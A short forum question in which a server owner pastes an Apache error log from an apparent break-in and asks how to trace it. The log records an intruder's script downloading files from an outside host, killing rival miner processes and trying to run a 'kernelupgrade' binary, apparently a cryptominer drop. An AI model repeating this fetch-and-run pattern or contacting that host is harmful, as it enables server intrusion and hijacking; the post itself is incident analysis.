Apache error log interpretation
- by HTF
It looks like someone gained access to my server.
How I can find out which Apache vHosts this log is related to?
How these commands from the log are invoked and how/why they are printed to the log file - is this some remote shell or PHP script?
/var/log/httpd/error_log
mkdir: cannot create directory `/tmp/.kdso': File exists
--2014-06-13 13:29:17-- http://updates.dyndn-web.com/abc.txt
Resolving updates.dyndn-web.com... 94.23.49.91
Connecting to updates.dyndn-web.com|94.23.49.91|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5055 (4.9K) [text/plain]
Saving to: `abc.txt'
0K .... 100% 303K=0.02s
2014-06-13 13:29:17 (303 KB/s) - `abc.txt' saved [5055/5055]
% Total % Received % Xferd Average Speed Time Time Time Current
Dload Upload Total Spent Left Speed
^M 0 0 0 0 0 0 0 0 --:--:-- --:--:-- --:--:-- 0^M101 5055 101 5055 0 0 79686 0 --:--:-- --:--:-- --:--:-- 154k
minerd64: no process killed
minerd32: no process killed
named: no process killed
kernelupdates: no process killed
kernelcfg: no process killed
kernelorg: no process killed
ls: cannot access /tmp/.ICE-unix: No such file or directory
mkdir: cannot create directory `/tmp': File exists
--2014-06-13 13:29:18-- http://updates.dyndn-web.com/64.tar.gz
Resolving updates.dyndn-web.com... 94.23.49.91
Connecting to updates.dyndn-web.com|94.23.49.91|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 205812 (201K) [application/x-tar]
Saving to: `64.tar.gz'
0K .......... .......... .......... .......... .......... 24% 990K 0s
50K .......... .......... .......... .......... .......... 49% 2.74M 0s
100K .......... .......... .......... .......... .......... 74% 2.96M 0s
150K .......... .......... .......... .......... .......... 99% 3.49M 0s
200K 100% 17.4M=0.1s
2014-06-13 13:29:18 (1.99 MB/s) - `64.tar.gz' saved [205812/205812]
sh: ./kernelupgrade: Permission denied